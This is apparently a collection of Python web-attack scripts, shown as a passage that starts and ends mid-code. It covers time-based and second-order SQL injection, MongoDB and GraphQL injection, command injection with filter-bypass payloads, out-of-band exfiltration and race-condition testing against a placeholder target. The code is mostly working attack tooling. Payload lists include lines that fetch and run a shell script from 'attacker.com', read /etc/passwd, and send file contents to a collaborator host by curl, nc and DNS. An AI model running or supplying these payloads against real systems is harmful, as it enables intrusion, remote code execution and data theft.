'false': f"WAITFOR DELAY '0:0:0'",
'conditional': f"; IF {{condition}} WAITFOR DELAY '0:0:{self.delay}'--"
},
'oracle': {
'true': f"dbms_pipe.receive_message('a',{self.delay})",
'false': f"dbms_pipe.receive_message('a',0)",
'conditional': f"BEGIN IF {{condition}} THEN dbms_pipe.receive_message('a',{self.delay}); ELSE dbms_pipe.receive_message('a',0); END IF; END;"
}
}
def detect_database(self):
"""Identify the database type"""
detected_db = None
max_time = 0
for db_type, payloads in self.db_payloads.items():
payload = f"' OR {payloads['true']}--"
test_url = self.build_url(payload)
start_time = time.time()
try:
response = self.session.get(test_url, timeout=self.delay + 2)
elapsed = time.time() - start_time
if elapsed >= self.delay - self.threshold:
detected_db = db_type
break
except:
continue
return detected_db
def extract_data(self, query, db_type):
"""Extract data character by character using binary search"""
charset = string.printable
result = ""
position = 1
while True:
low = 0
high = len(charset) - 1
found_char = None
while low <= high:
mid = (low + high) // 2
current_char = charset[mid]
# Build condition: ASCII value comparison
condition = f"ASCII(SUBSTRING(({query}),{position},1)) > {ord(current_char)}"
payload = self.db_payloads[db_type]['conditional'].format(condition=condition)
injection = f"' OR {payload}--"
test_url = self.build_url(injection)
start_time = time.time()
try:
response = self.session.get(test_url, timeout=self.delay + 2)
elapsed = time.time() - start_time
if elapsed >= self.delay - self.threshold:
# Condition true, search upper half
low = mid + 1
else:
# Condition false, search lower half
high = mid - 1
except Exception as e:
print(f"Error: {e}")
break
if low > high and low < len(charset):
found_char = charset[low]
result += found_char
print(f"[+] Found: {result}")
position += 1
else:
break
return result
def parallel_extraction(self, queries, db_type, max_workers=5):
"""Extract multiple pieces of data in parallel"""
results = {}
with ThreadPoolExecutor(max_workers=max_workers) as executor:
future_to_query = {
executor.submit(self.extract_data, query, db_type): query
for query in queries
}
for future in as_completed(future_to_query):
query = future_to_query[future]
try:
data = future.result()
results[query] = data
except Exception as e:
results[query] = f"Error: {e}"
return results
def build_url(self, payload):
"""Construct the target URL with injection"""
# Handle different injection points
if self.injection_point == 'query':
return f"{self.target_url}?{self.param_name}={quote(payload)}"
elif self.injection_point == 'cookie':
# Return session with modified cookie
self.session.cookies.set(self.param_name, payload)
return self.target_url
else:
return self.target_url.replace('INJECTION_POINT', quote(payload))
# Usage example
sqli = TimeBasedSQLi(
target_url="http://target.com/search",
param_name="q",
injection_point="query"
)
# Detect database
db_type = sqli.detect_database()
print(f"[*] Detected database: {db_type}")
# Extract data
queries = [
"SELECT user()",
"SELECT database()",
"SELECT @@version",
"SELECT table_name FROM information_schema.tables LIMIT 5"
]
results = sqli.parallel_extraction(queries, db_type)
for query, result in results.items():
print(f"[*] {query}: {result}")#!/usr/bin/env python3
"""
Second-Order SQL Injection Detection
Tests for stored/triggered SQL injection attacks
"""
import requests
import time
from urllib.parse import urljoin
class SecondOrderSQLiDetector:
def __init__(self, base_url, session_cookies=None):
self.base_url = base_url
self.session = requests.Session()
if session_cookies:
self.session.cookies.update(session_cookies)
self.payloads = [
# Classic second-order payloads
"admin'--",
"admin' OR '1'='1",
"test'; DROP TABLE users--",
# Time-based for detection
"test'; WAITFOR DELAY '0:0:5'--",
"test' AND SLEEP(5)--",
# Error-based
"test' AND 1=CONVERT(int, @@version)--",
# Union-based (for when triggered)
"test' UNION SELECT NULL--"
]
def test_registration_flow(self):
"""Test user registration -> login flow"""
findings = []
for payload in self.payloads:
print(f"[*] Testing payload: {payload}")
# 1. Register with malicious payload
reg_data = {
'username': f'test_{int(time.time())}',
'email': f'{payload}@test.com',
'password': 'Password123!'
}
reg_response = self.session.post(
urljoin(self.base_url, '/register'),
data=reg_data
)
if reg_response.status_code == 200:
# 2. Attempt login (might trigger second-order)
login_data = {
'email': f'{payload}@test.com',
'password': 'Password123!'
}
start_time = time.time()
login_response = self.session.post(
urljoin(self.base_url, '/login'),
data=login_data
)
elapsed = time.time() - start_time
# 3. Analyze response
if elapsed > 5: # Time-based detection
findings.append({
'type': 'time_based',
'payload': payload,
'delay': elapsed,
'vector': 'registration->login'
})
if 'error' in login_response.text.lower() and 'sql' in login_response.text.lower():
findings.append({
'type': 'error_based',
'payload': payload,
'response_snippet': login_response.text[:200],
'vector': 'registration->login'
})
time.sleep(1) # Rate limiting
return findings
def test_profile_update(self):
"""Test profile update -> display flow"""
findings = []
# First, create a normal user
user_data = {
'username': f'victim_{int(time.time())}',
'email': 'victim@test.com',
'password': 'Password123!'
}
self.session.post(
urljoin(self.base_url, '/register'),
data=user_data
)
# Login
self.session.post(
urljoin(self.base_url, '/login'),
data={'email': 'victim@test.com', 'password': 'Password123!'}
)
# Update profile with malicious payload
for payload in self.payloads:
update_data = {
'display_name': payload,
'bio': f'Bio with {payload}'
}
update_response = self.session.post(
urljoin(self.base_url, '/profile/update'),
data=update_data
)
if update_response.status_code == 200:
# View profile (might trigger second-order)
start_time = time.time()
profile_response = self.session.get(
urljoin(self.base_url, '/profile')
)
elapsed = time.time() - start_time
if elapsed > 5:
findings.append({
'type': 'time_based',
'payload': payload,
'delay': elapsed,
'vector': 'profile_update->display'
})
if any(err in profile_response.text.lower()
for err in ['sql', 'database', 'syntax']):
findings.append({
'type': 'error_based',
'payload': payload,
'vector': 'profile_update->display'
})
return findings
def automated_detection(self):
"""Run all second-order SQLi tests"""
all_findings = []
print("[*] Testing registration -> login flow")
all_findings.extend(self.test_registration_flow())
print("[*] Testing profile update -> display flow")
all_findings.extend(self.test_profile_update())
# Additional test vectors
test_vectors = [
('/comment', 'content', '/comments'), # Comment -> display
('/product/review', 'review', '/product'), # Review -> product page
('/ticket/create', 'description', '/ticket/view') # Ticket create -> view
]
for create_endpoint, param_name, trigger_endpoint in test_vectors:
print(f"[*] Testing {create_endpoint} -> {trigger_endpoint}")
findings = self.test_generic_flow(create_endpoint, param_name, trigger_endpoint)
all_findings.extend(findings)
return all_findings
def test_generic_flow(self, create_endpoint, param_name, trigger_endpoint):
"""Test a generic create -> trigger flow"""
findings = []
for payload in self.payloads[:3]: # Test first 3 payloads
# Create resource with payload
data = {param_name: payload, 'title': 'Test'}
create_response = self.session.post(
urljoin(self.base_url, create_endpoint),
data=data
)
if create_response.status_code in [200, 201]:
# Trigger the second-order
start_time = time.time()
trigger_response = self.session.get(
urljoin(self.base_url, trigger_endpoint)
)
elapsed = time.time() - start_time
if elapsed > 5:
findings.append({
'type': 'time_based',
'payload': payload,
'delay': elapsed,
'vector': f'{create_endpoint}->{trigger_endpoint}'
})
return findings
# Usage
detector = SecondOrderSQLiDetector("http://target.com")
findings = detector.automated_detection()
for finding in findings:
print(f"[!] Found second-order SQLi: {finding}")#!/usr/bin/env python3
"""
Advanced MongoDB NoSQL Injection Testing
Covers aggregation pipelines, $function, MapReduce, etc.
"""
import requests
import json
from urllib.parse import quote
class MongoDBInjector:
def __init__(self, target_url, param_name='query'):
self.target_url = target_url
self.param_name = param_name
self.session = requests.Session()
# Advanced MongoDB payloads
self.payloads = {
'authentication_bypass': [
# Classic
'{"$ne": null}',
'{"$gt": ""}',
'{"$regex": ".*"}',
# Using $where with JavaScript
'{"$where": "true"}',
'{"$where": "1 == 1"}',
# Using $expr
'{"$expr": {"$eq": [1, 1]}}',
],
'data_extraction': [
# Extract all documents
'{"$where": "this.username == \\\"admin\\\""}',
# Using $function in aggregation
'{"$function": "function() { return this.password; }"}',
# MapReduce injection
'{"map": "function() { emit(this.username, this.password); }"}',
],
'javascript_execution': [
# Direct JavaScript execution
'{"$where": "sleep(5000) || true"}',
'{"$where": "d = new Date(); do {cur = new Date();} while(cur - d < 5000)"}',
# Using $function with sleep
'{"$function": "function() { var d = new Date(); while(new Date() - d < 5000) {}; return true; }"}',
],
'aggregation_pipeline': [
# Malicious aggregation stages
'[{"$match": {"username": {"$ne": null}}}, {"$project": {"password": 1}}]',
# Using $addFields to leak data
'[{"$addFields": {"leaked": "$password"}}]',
# $lookup with malicious pipeline
'[{"$lookup": {"from": "users", "pipeline": [{"$project": {"password": 1}}], "as": "leaked"}}]',
]
}
def test_injection_point(self, method='GET', data_type='json'):
"""Test for NoSQL injection vulnerabilities"""
vulnerabilities = []
for category, payload_list in self.payloads.items():
for payload in payload_list:
print(f"[*] Testing {category}: {payload[:50]}...")
if method.upper() == 'GET':
# URL encode for GET
test_url = f"{self.target_url}?{self.param_name}={quote(payload)}"
response = self.session.get(test_url)
else:
# POST with different content types
if data_type == 'json':
headers = {'Content-Type': 'application/json'}
data = json.dumps({self.param_name: json.loads(payload)})
else: # form data
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {self.param_name: payload}
response = self.session.post(
self.target_url,
data=data,
headers=headers
)
# Analyze response
if self.is_successful_injection(response, category):
vulnerabilities.append({
'category': category,
'payload': payload,
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds(),
'indicators': self.extract_indicators(response)
})
return vulnerabilities
def is_successful_injection(self, response, category):
"""Determine if injection was successful"""
indicators = {
'authentication_bypass': [
response.status_code in [200, 302],
'logout' in response.text,
'Welcome' in response.text,
'Invalid credentials' not in response.text
],
'data_extraction': [
'password' in response.text.lower(),
'email' in response.text.lower(),
'admin' in response.text,
len(response.json()) > 0 if self.is_json(response) else False
],
'javascript_execution': [
response.elapsed.total_seconds() > 5,
'timeout' in response.text.lower()
]
}
if category in indicators:
return any(indicators[category])
return False
def blind_injection(self, conditional_payloads):
"""Perform blind NoSQL injection"""
extracted_data = ""
charset = "abcdefghijklmnopqrstuvwxyz0123456789"
for i in range(1, 50): # Extract up to 50 characters
found_char = None
for char in charset:
# Build condition: if character at position i equals char
condition = f'this.password.charAt({i-1}) == "{char}"'
payload = f'{{"$where": "{condition}"}}'
start_time = time.time()
response = self.session.post(
self.target_url,
json={'query': json.loads(payload)},
timeout=10
)
elapsed = time.time() - start_time
# If condition true (admin user exists), we might get different response time
if elapsed > 2: # Threshold for time-based
found_char = char
extracted_data += char
print(f"[+] Found char {i}: {char}")
break
if not found_char:
break
return extracted_data
def test_operator_injection(self):
"""Test for MongoDB operator injection"""
operators = [
# Comparison
'$eq', '$ne', '$gt', '$gte', '$lt', '$lte', '$in', '$nin',
# Logical
'$and', '$or', '$not', '$nor',
# Element
'$exists', '$type',
# Evaluation
'$expr', '$jsonSchema', '$mod', '$regex', '$text', '$where',
# Geospatial
'$geoIntersects', '$geoWithin', '$near', '$nearSphere',
# Array
'$all', '$elemMatch', '$size',
# Bitwise
'$bitsAllClear', '$bitsAllSet', '$bitsAnyClear', '$bitsAnySet'
]
vulnerabilities = []
for operator in operators:
# Test if operator can be injected
payload = f'{{"{operator}": [1, 1]}}'
response = self.session.post(
self.target_url,
json={'filter': json.loads(payload)}
)
# Check if operator was processed
if response.status_code == 200:
try:
data = response.json()
# Look for signs of operator execution
if data and len(data) > 0:
vulnerabilities.append({
'operator': operator,
'payload': payload,
'result_count': len(data)
})
except:
pass
return vulnerabilities
# Usage
injector = MongoDBInjector("http://target.com/api/users")
vulns = injector.test_injection_point(method='POST', data_type='json')
for vuln in vulns:
print(f"[!] Vulnerability found: {vuln['category']}")#!/usr/bin/env python3
"""
GraphQL Injection Testing Framework
Includes introspection abuse, query batching, and persisted query attacks
"""
import requests
import json
import re
class GraphQLInjector:
def __init__(self, endpoint, headers=None):
self.endpoint = endpoint
self.headers = headers or {'Content-Type': 'application/json'}
self.session = requests.Session()
def introspection_abuse(self):
"""Abuse GraphQL introspection to gather schema information"""
introspection_query = """
query IntrospectionQuery {
__schema {
types {
name
kind
description
fields {
name
description
type {
name
kind
ofType { name kind }
}
args {
name
description
type { name kind ofType { name kind } }
defaultValue
}
}
}
}
}
"""
response = self.session.post(
self.endpoint,
json={'query': introspection_query},
headers=self.headers
)
if response.status_code == 200:
schema = response.json()
# Extract sensitive fields
sensitive_fields = self.find_sensitive_fields(schema)
# Generate malicious queries based on schema
malicious_queries = self.generate_malicious_queries(schema)
return {
'schema_obtained': True,
'sensitive_fields': sensitive_fields,
'malicious_queries': malicious_queries[:5] # First 5
}
return {'schema_obtained': False}
def find_sensitive_fields(self, schema):
"""Identify potentially sensitive fields in schema"""
sensitive_keywords = [
'password', 'email', 'token', 'secret', 'key',
'credit', 'card', 'ssn', 'address', 'phone',
'admin', 'role', 'permission', 'salary', 'private'
]
sensitive = []
for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
if type_info.get('fields'):
for field in type_info['fields']:
field_name = field.get('name', '').lower()
field_desc = field.get('description', '').lower()
if any(keyword in field_name or keyword in field_desc
for keyword in sensitive_keywords):
sensitive.append({
'type': type_info['name'],
'field': field['name'],
'description': field.get('description', '')
})
return sensitive
def generate_malicious_queries(self, schema):
"""Generate potentially malicious queries based on schema"""
queries = []
# 1. Query for all data
for type_info in schema.get('data', {}).get('__schema', {}).get('types', []):
if type_info.get('fields') and not type_info['name'].startswith('__'):
# Build query to get all fields of this type
fields = [field['name'] for field in type_info['fields']]
query = f"query {{ {type_info['name'].lower()} {{ {' '.join(fields)} }} }}"
queries.append(query)
# 2. Nested queries (depth exploitation)
queries.append("""
query {
users {
id
email
posts {
id
content
comments {
id
content
author {
id
email
}
}
}
}
}
""")
# 3. Batch queries (query batching attack)
batch_query = []
for i in range(100):
batch_query.append({
'query': 'query { __typename }'
})
queries.append(json.dumps(batch_query))
return queries
def test_query_complexity(self):
"""Test for query complexity/DoS vulnerabilities"""
# Very deep query
deep_query = "query { " + "a { " * 100 + "__typename" + " }" * 100 + " }"
# Very wide query
wide_query = "query { " + " ".join([f"field{i}: __typename" for i in range(1000)]) + " }"
queries = [
('deep', deep_query),
('wide', wide_query)
]
results = []
for name, query in queries:
try:
response = self.session.post(
self.endpoint,
json={'query': query},
headers=self.headers,
timeout=30
)
results.append({
'test': name,
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds(),
'error': 'timeout' if response.elapsed.total_seconds() > 29 else None
})
except requests.exceptions.Timeout:
results.append({
'test': name,
'status_code': 'TIMEOUT',
'response_time': 30,
'error': 'timeout'
})
return results
def test_persisted_query_injection(self):
"""Test for persisted query attacks"""
# Try to guess query IDs
query_ids = []
for i in range(1000):
# Common patterns for persisted query IDs
patterns = [
f"{i:08x}", # Hex
f"{i}", # Decimal
f"q{i:04d}", # q0001 format
]
for pattern in patterns:
response = self.session.post(
self.endpoint,
json={'queryId': pattern},
headers=self.headers
)
if response.status_code == 200:
data = response.json()
if 'data' in data and not data.get('errors'):
query_ids.append({
'id': pattern,
'response': data.get('data', {})
})
return query_ids
def test_field_duplication(self):
"""Test GraphQL field duplication attacks"""
# Some GraphQL implementations process duplicate fields multiple times
query = """
query {
user(id: "1") {
email
email
email
email
email
}
}
"""
response = self.session.post(
self.endpoint,
json={'query': query},
headers=self.headers
)
if response.status_code == 200:
data = response.json()
# Check if email appears multiple times
if 'data' in data:
user_data = data['data'].get('user', {})
emails = [v for k, v in user_data.items() if k == 'email']
if len(emails) > 1:
return {
'vulnerable': True,
'duplicate_count': len(emails),
'values': emails
}
return {'vulnerable': False}
def automated_injection_test(self):
"""Run all GraphQL injection tests"""
results = {}
print("[*] Testing introspection access")
results['introspection'] = self.introspection_abuse()
print("[*] Testing query complexity limits")
results['complexity'] = self.test_query_complexity()
print("[*] Testing persisted query attacks")
results['persisted_queries'] = self.test_persisted_query_injection()
print("[*] Testing field duplication")
results['field_duplication'] = self.test_field_duplication()
# Test for SQL injection through GraphQL arguments
print("[*] Testing SQL injection in GraphQL arguments")
results['sqli'] = self.test_graphql_sqli()
return results
def test_graphql_sqli(self):
"""Test for SQL injection in GraphQL arguments"""
sqli_payloads = [
"' OR '1'='1",
"admin'--",
"1; DROP TABLE users--",
"1' AND SLEEP(5)--"
]
vulnerable_endpoints = []
# Get schema first to know what queries are available
schema = self.introspection_abuse()
if schema.get('schema_obtained'):
# Look for queries with string arguments
for type_info in schema.get('types', []):
if type_info.get('fields'):
for field in type_info['fields']:
if field.get('args'):
for arg in field['args']:
arg_type = arg.get('type', {}).get('name', '')
if arg_type == 'String':
# Test this argument
query = f"""
query {{
{field['name']}({arg['name']}: "PAYLOAD") {{
id
}}
}}
"""
for payload in sqli_payloads:
test_query = query.replace('PAYLOAD', payload)
response = self.session.post(
self.endpoint,
json={'query': test_query},
headers=self.headers,
timeout=10
)
if response.status_code == 200:
data = response.json()
errors = data.get('errors', [])
# Check for SQL errors
if any('sql' in str(error).lower() or
'syntax' in str(error).lower()
for error in errors):
vulnerable_endpoints.append({
'query': field['name'],
'argument': arg['name'],
'payload': payload,
'error': str(errors[0])[:200]
})
return vulnerable_endpoints
# Usage
gql = GraphQLInjector("http://target.com/graphql",
headers={'Authorization': 'Bearer token'})
results = gql.automated_injection_test()
print(json.dumps(results, indent=2))#!/usr/bin/env python3
"""
Advanced Command Injection Techniques with Filter Bypass
Includes encoding, whitespace variations, and command chaining
"""
import requests
import urllib.parse
import string
class CommandInjector:
def __init__(self, target_url, vulnerable_param):
self.target_url = target_url
self.vulnerable_param = vulnerable_param
self.session = requests.Session()
# Command injection payloads with various bypass techniques
self.payloads = {
'basic': [
';id',
'|id',
'&id',
'&&id',
'||id',
'`id`',
'$(id)',
'){id}',
],
'whitespace_variations': [
'id',
'id',
'i\\d',
'i\\\td',
'i\\\nd',
'{i,d}',
'i$@d',
'i$()d',
'i${IFS}d',
],
'encoding': [
# URL encoding
'%3bid',
'%7cid',
'%26id',
'%60id%60',
'%24%28id%29',
# Double URL encoding
'%253bid',
'%257cid',
# Hex encoding
'\\x3bid',
'\\x7cid',
# Octal encoding
'\\073id',
'\\174id',
# Unicode encoding
'%u003bid',
'%u007cid',
],
'case_variation': [
'Id',
'iD',
'ID',
'Id',
],
'command_concatenation': [
'i''d',
'i""d',
'i\'\'d',
'i$@d',
],
'environment_variables': [
'${PATH:0:1}id',
'${LS_COLORS:10:1}id',
'${PWD:0:1}id',
],
'advanced_chaining': [
'; id; #',
'| id |',
'& id &',
'&& id &&',
'|| id ||',
'`id` #',
'$(id) #',
'){ id; }',
'; id && echo vulnerable',
'| id | grep -i root',
'& cat /etc/passwd &',
'; ping -c 1 attacker.com;',
'; curl attacker.com/shell.sh | bash;',
'; wget attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh;',
],
'blind_injection': [
'; sleep 5;',
'| sleep 5 |',
'& sleep 5 &',
'`sleep 5`',
'$(sleep 5)',
'; ping -c 5 127.0.0.1;',
'; cat /dev/zero | head -c 1000000;',
],
'filter_bypass': [
# Bypass "cat" filter
'c\\at',
'c""at',
'c\'\'at',
'c$@at',
'c${IFS}at',
'ca\t',
'c\\a\\t',
'/???/??t', # /bin/cat
'/?in/?at',
# Bypass space filter
'cat${IFS}/etc/passwd',
'cat</etc/passwd',
'cat<>/etc/passwd',
'{cat,/etc/passwd}',
'cat$@/etc/passwd',
'X=$'\x20'&&cat$X/etc/passwd',
# Bypass slash filter
'cat /etc/passwd',
'cat etc/passwd', # Relative path
'cat .//etc//passwd',
'cat /???/??????', # /etc/passwd
# Bypass keyword filters with encoding
'$(echo${IFS}Y2F0IC9ldGMvcGFzc3dkCg==|base64${IFS}-d|bash)',
'`echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d`',
]
}
def test_all_payloads(self, base_value='127.0.0.1'):
"""Test all payload categories"""
results = {}
for category, payload_list in self.payloads.items():
print(f"[*] Testing {category} payloads")
category_results = []
for payload in payload_list:
# Construct the injection
if base_value:
injection = f"{base_value}{payload}"
else:
injection = payload
# Test the injection
result = self.test_payload(injection)
if result['indicators']['injection_detected']:
category_results.append({
'payload': payload,
'response_time': result['response_time'],
'status_code': result['status_code'],
'indicators': result['indicators']['detected_indicators']
})
results[category] = category_results
return results
def test_payload(self, injection):
"""Test a single payload"""
# URL encode if needed
encoded_injection = urllib.parse.quote(injection)
# Construct request
params = {self.vulnerable_param: injection}
# Measure response time for blind injection detection
import time
start_time = time.time()
try:
response = self.session.get(
self.target_url,
params=params,
timeout=10
)
response_time = time.time() - start_time
# Analyze response for injection indicators
indicators = self.analyze_response(response, response_time)
return {
'payload': injection,
'status_code': response.status_code,
'response_time': response_time,
'response_length': len(response.text),
'indicators': indicators
}
except requests.exceptions.Timeout:
return {
'payload': injection,
'status_code': 'TIMEOUT',
'response_time': 10,
'indicators': {'injection_detected': True, 'timeout': True}
}
def analyze_response(self, response, response_time):
"""Analyze response for command injection indicators"""
indicators = {
'injection_detected': False,
'detected_indicators': []
}
response_text = response.text.lower()
# Check for command output in response
command_output_indicators = [
'root:x:0:0',
'uid=',
'gid=',
'groups=',
'bin/bash',
'/home/',
'www-data',
'daemon',
'nobody',
'Linux',
'Unix',
'kernel',
'total ',
'drwx',
'-rw-',
'ls: cannot access',
'command not found',
'Permission denied',
'No such file or directory'
]
for indicator in command_output_indicators:
if indicator in response_text:
indicators['detected_indicators'].append(indicator)
indicators['injection_detected'] = True
# Check for time-based indicators
if response_time > 4.5: # For sleep 5 payloads
indicators['detected_indicators'].append(f'Time delay: {response_time}s')
indicators['injection_detected'] = True
# Check for error messages that indicate command execution
error_indicators = [
'sh:',
'bash:',
'dash:',
'ksh:',
'zsh:',
'/bin/sh:',
'/bin/bash:'
]
for error in error_indicators:
if error in response_text:
indicators['detected_indicators'].append(error)
indicators['injection_detected'] = True
return indicators
def automated_exploitation(self, command):
"""Automatically exploit command injection"""
# Find a working payload first
working_payloads = []
for category, payload_list in self.payloads.items():
for payload in payload_list[:5]: # Test first 5 from each category
test_result = self.test_payload(f"127.0.0.1{payload}")
if test_result['indicators']['injection_detected']:
working_payloads.append(payload)
break
if not working_payloads:
return {"error": "No working payload found"}
# Use first working payload to execute command
working_payload = working_payloads[0]
# Encode command if needed (for filters)
encoded_commands = [
command,
f"echo {command} | bash",
f"echo {command} | sh",
f"{command} 2>&1",
f"$(echo {command})"
]
results = []
for cmd in encoded_commands:
injection = f"127.0.0.1{working_payload.replace('id', cmd)}"
result = self.test_payload(injection)
if result['indicators']['injection_detected']:
results.append({
'command': cmd,
'success': True,
'response_preview': result.get('response_text', '')[:500]
})
else:
results.append({
'command': cmd,
'success': False
})
return results
# Usage
injector = CommandInjector("http://target.com/ping", "ip")
results = injector.test_all_payloads()
for category, payloads in results.items():
if payloads:
print(f"\n[!] {category} - {len(payloads)} successful payloads")
for p in payloads[:3]: # Show first 3
print(f" - {p['payload']} ({p['response_time']:.2f}s)")#!/usr/bin/env python3
"""
Out-of-Band (OOB) Command Injection Detection
Uses DNS, HTTP, and other protocols to confirm injection
"""
import requests
import time
import dns.resolver
from urllib.parse import quote
import subprocess
import threading
class OOBCommandInjector:
def __init__(self, target_url, param_name, collaborator_url=None):
self.target_url = target_url
self.param_name = param_name
self.collaborator = collaborator_url or self.setup_interactsh()
self.session = requests.Session()
# OOB payloads for different protocols
self.oob_payloads = {
'dns': [
# DNS lookup
'; nslookup $(whoami).{collaborator}',
'| nslookup $(id).{collaborator}',
'`nslookup $(hostname).{collaborator}`',
# Dig
'; dig $(cat /etc/passwd | base64).{collaborator}',
'| dig $(uname -a | base64).{collaborator}',
# Ping with DNS
'; ping -c 1 $(whoami).{collaborator}',
],
'http': [
# Curl/wget
'; curl http://{collaborator}/$(whoami)',
'| wget http://{collaborator}/$(id)',
'`curl http://{collaborator}/$(hostname)`',
# With data exfiltration
'; curl -X POST http://{collaborator} -d "$(cat /etc/passwd | base64)"',
'| wget --post-data="$(uname -a)" http://{collaborator}',
# Using netcat
'; cat /etc/passwd | base64 | nc {collaborator} 80',
],
'icmp': [
# Ping with data in size
'; ping -c 1 -s $(expr $(whoami | wc -c) + 8) {collaborator}',
'| ping -c 1 -p $(printf "%x" $(id | sum | cut -f1 -d" ")) {collaborator}',
],
'nslookup_python': [
# Python one-liners
'; python3 -c "import os; import socket; socket.gethostbyname(os.popen(\'whoami\').read().strip() + \'.{collaborator}\')"',
'| python3 -c "import os; import urllib.request; urllib.request.urlopen(\'http://{collaborator}/\'.join(os.popen(\'id\').read()))"',
],
'blind_with_delay': [
# Time-based with DNS (will cause delay on DNS resolution failure)
'; ping -c 1 $(whoami).{collaborator} || sleep 5',
'| nslookup $(id).{collaborator} || sleep 5',
]
}
def setup_interactsh(self):
"""Set up InteractSH server for OOB testing"""
try:
# Start InteractSH client
import tempfile
import os
# Create temporary directory for InteractSH
temp_dir = tempfile.mkdtemp()
client_path = os.path.join(temp_dir, 'interactsh-client')
# Download interactsh-client if not exists
# Note: In real use, you would have this pre-installed
print("[*] Note: Install interactsh-client from https://github.com/projectdiscovery/interactsh")
# For demo, we'll use a placeholder
return "your-subdomain.interact.sh"
except Exception as e:
print(f"[-] InteractSH setup failed: {e}")
return "attacker-controlled-domain.com"
def monitor_interactions(self, duration=60):
"""Monitor for interactions with collaborator"""
interactions = []
# In real implementation, you would:
# 1. Start InteractSH client
# 2. Monitor for DNS/HTTP interactions
# 3. Parse incoming data
print(f"[*] Monitoring for interactions for {duration} seconds...")
print("[*] In real scenario, this would connect to InteractSH server")
# Simulated monitoring
time.sleep(duration)
# Return simulated interactions for demo
simulated_interactions = [
{
'type': 'dns',
'timestamp': time.time(),
'data': 'root.d3b4a1c2.interact.sh',
'protocol': 'DNS'
},
{
'type': 'http',
'timestamp': time.time() + 5,
'data': 'GET /root HTTP/1.1',
'protocol': 'HTTP'
}
]
return simulated_interactions
def test_oob_injection(self):
"""Test for OOB command injection"""
results = []
# Start monitoring in background
monitor_thread = threading.Thread(
target=self.monitor_interactions,
args=(120,)
)
monitor_thread.start()
# Send payloads
for protocol, payload_list in self.oob_payloads.items():
print(f"[*] Testing {protocol} OOB payloads")
for payload_template in payload_list[:3]: # Test first 3
payload = payload_template.format(collaborator=self.collaborator)
encoded_payload = quote(payload)
# Send request
params = {self.param_name: payload}
try:
response = self.session.get(
self.target_url,
params=params,
timeout=10
)
results.append({
'protocol': protocol,
'payload': payload[:100],
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds()
})
print(f" [+] Sent {protocol} payload: {payload[:50]}...")
except Exception as e:
results.append({
'protocol': protocol,
'payload': payload[:100],
'error': str(e)
})
time.sleep(1) # Rate limiting
# Wait for monitoring to complete
monitor_thread.join()
# Get interactions
interactions = self.monitor_interactions()
return {
'sent_payloads': results,
'interactions': interactions,
'oob_detected': len(interactions) > 0
}
def automated_data_exfiltration(self, file_path):
"""Automatically exfiltrate data using OOB"""
# Generate payloads for data exfiltration
exfiltration_methods = [
# Base64 encoding via DNS
f'; cat {file_path} | base64 | tr -d "\\n" | fold -w 63 | while read chunk; do nslookup $chunk.{{collaborator}}; done',
# HTTP POST
f'; curl -X POST http://{{collaborator}}/exfil -d "$(cat {file_path} | base64)"',
# Using xxd for hex encoding
f'; xxd -p {file_path} | tr -d "\\n" | fold -w 60 | while read chunk; do ping -c 1 $chunk.{{collaborator}}; done',
# Python one-liner for large files
f'; python3 -c "import urllib.request, base64; urllib.request.urlopen(\'http://{{collaborator}}/\' + base64.b64encode(open(\'{file_path}\', \'rb\').read()).decode())"',
]
results = []
for method in exfiltration_methods:
payload = method.format(collaborator=self.collaborator)
print(f"[*] Testing exfiltration: {payload[:80]}...")
# Send payload
params = {self.param_name: payload}
try:
response = self.session.get(
self.target_url,
params=params,
timeout=30
)
results.append({
'method': method[:50],
'status': 'sent',
'response_time': response.elapsed.total_seconds()
})
except Exception as e:
results.append({
'method': method[:50],
'status': 'error',
'error': str(e)
})
time.sleep(2)
# Monitor for incoming data
print("[*] Monitoring for exfiltrated data...")
time.sleep(30)
# In real implementation, you would parse the received data
# from your collaborator server
return results
# Usage
oob_tester = OOBCommandInjector(
"http://target.com/run",
"cmd",
collaborator="your-domain.interact.sh"
)
results = oob_tester.test_oob_injection()
if results['oob_detected']:
print("[!] OOB Command Injection detected!")
for interaction in results['interactions']:
print(f" [+] {interaction['protocol']}: {interaction['data']}")#!/usr/bin/env python3
"""
Advanced Race Condition Testing Framework
Tests for TOCTOU, limit bypass, and concurrency vulnerabilities
"""
import asyncio
import aiohttp
import time
from typing import List, Dict
import statistics
class RaceConditionTester:
def __init__(self, target_url, session_cookies=None):
self.target_url = target_url
self.cookies = session_cookies or {}
self.results = []
async def send_concurrent_requests(self,
request_template,
concurrency=10,
total_requests=100):
"""Send concurrent requests to test for race conditions"""
async with aiohttp.ClientSession(cookies=self.cookies) as session:
tasks = []
for i in range(total_requests):
# Modify request if needed (e.g., different IDs)
request = self.modify_request(request_template, i)
task = self.send_request(session, request)
tasks.append(task)
# Send in batches for concurrency control
responses = []
for i in range(0, len(tasks), concurrency):
batch = tasks[i:i+concurrency]
batch_responses = await asyncio.gather(*batch, return_exceptions=True)
responses.extend(batch_responses)
# Small delay between batches
await asyncio.sleep(0.1)
return responses
async def send_request(self, session, request):
"""Send individual request"""
try:
async with session.request(
method=request['method'],
url=request['url'],
headers=request.get('headers', {}),
data=request.get('data'),
json=request.get('json')
) as response:
return {
'status': response.status,
'text': await response.text(),
'headers': dict(response.headers)
}
except Exception as e:
return {'error': str(e)}
def modify_request(self, template, index):
"""Modify request template for testing"""
request = template.copy()
# Modify based on index
if 'data' in request:
# For form data
if isinstance(request['data'], dict):
# Add sequence number to avoid duplicates
request['data'] = request['data'].copy()
for key in request['data']:
if 'UNIQUE' in str(request['data'][key]):
request['data'][key] = request['data'][key].replace('UNIQUE', str(index))
elif 'json' in request:
# For JSON data
if isinstance(request['json'], dict):
request['json'] = request['json'].copy()
# Modify JSON values
import json
json_str = json.dumps(request['json'])
if 'UNIQUE' in json_str:
json_str = json_str.replace('UNIQUE', str(index))
request['json'] = json.loads(json_str)
return request
async def test_coupon_race(self, coupon_code, concurrency=20):
"""Test for coupon code race condition"""
request_template = {
'method': 'POST',
'url': f'{self.target_url}/api/apply-coupon',
'headers': {'Content-Type': 'application/json'},
'json': {
'coupon_code': coupon_code,
'order_id': 'ORDER_UNIQUE'
}
}
